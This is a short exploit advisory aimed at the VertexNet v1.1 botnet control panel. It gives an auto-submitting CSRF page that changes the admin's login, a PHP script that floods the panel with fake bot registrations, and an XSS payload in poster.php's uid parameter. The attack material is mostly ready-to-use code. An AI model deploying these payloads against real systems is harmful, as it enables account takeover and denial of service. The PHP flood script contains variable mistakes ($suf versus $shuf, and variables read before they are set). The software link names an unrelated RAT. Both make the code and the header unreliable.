# Exploit Title: VertexNet botnet v1.1 multi vulnerability
# Date: 3-12-2015
# Exploit Author: alqnas eslam
# Vendor Homepage:fb.com/alqnas4
# Software Link: http://darkcomet-rat.com/
# Tested on:windows or linux

1- csrf change password and setting:

save this code in html file and send it to admin
when he open it the setting will be changed
<body onload="document.alqnas.submit()">
<form action="http://localhost/panel/index.php?page=set" method="post" name="alqnas">
<input type="text" name="maxusers" value="15" />
<input type="text" name="userswidth" value="400"  />
<input type="text" name="showgeo" value="y" />
<input type="text" name="showoff" value="y" />
<input type="text" name="username" value="admin" />
<input type="text" name="password" value="alqnas" />
<input type="submit" />
</form>
</body>


2- bots flood:

you can do flood bots by this code run it with php

<?php
   $i =1;
   function adduser($url)
{
    $ch = curl_init();

    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    $output=curl_exec($ch);
    curl_close($ch);
    return $output;
}
//400 are numbers you will send it
while ( $i <=400){
$rand = substr( $d , 0 , 5 );
$shuf = substr( $a , 0 , 5 );
$d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
$a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
                //change localhost to url of bot
echo adduser("http://localhost/Panel/adduser.php?uid=$rand&cmpname=$suf&country=$rand&cc=$shuf&idle=$rand&lan=$rand&ver=$shuf");
   $i++;
}
?> 

3- cross site scripting (xss)

in file poster.php prametar uid not fillter from html code
so we can do xss attack
http://localhost/Panel/poster.php?uid="><script>alert(/xss/)</script>


# siph0n [2015-12-07]